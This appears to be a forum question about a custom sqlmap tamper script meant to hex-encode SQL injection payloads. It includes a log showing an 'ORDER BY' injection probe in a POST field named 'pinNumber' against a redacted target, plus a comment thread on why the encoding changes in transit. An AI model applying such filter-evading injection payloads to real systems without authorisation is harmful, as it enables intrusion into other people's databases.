# sqlmap tampered payload doesn't insert correctly

Tags: sql-injection, sqlmap, tampering

My problem is that I have made my own tampered payload that should convert the actual payload to hex format.

You can see from the log that the tampered payload is correct, but in the post data "pinNumber" it has been tampered again by something.

- Why?

I know that `sqlmap` url encodes if it's `x-www-form-urlencoded`, but I added the option `--skip-url-encode` to bypass that problem. I want to send the hex string that shows in the [PAYLOAD] message to be sent to the target. Do you have any ideas?

```
My untampered payload is this:   ORDER BY 1086-- Nodo
[12:28:13] [PAYLOAD] \x20\x4F\x52\x44\x45\x52\x20\x42\x59\x20\x31\x30\x38\x36\x2D\x2D\x20\x4E\x6F\x64\x6F
[12:28:13] [TRAFFIC OUT] HTTP request [#80]:
POST ****** HTTP/1.1
Host: some.example.com
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: */*
Accept-language: sv-SE,sv;q=0.8,en-US;q=0.5,en;q=0.3
Accept-encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Origin: **************
Referer: ********************************************
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Content-length: 49
Connection: close

pinNumber= \x4FRDER BY 1086\x2D\x2D \x4E\x6Fd\x6F
```

Comment: What happens if you run the query manually, using curl or a browser?

Comment: @A.Darwin that works fine if you insert the hex into pinNumber. But I want to do it through sql-map. I first used burp suite to insert the payload, that works fine.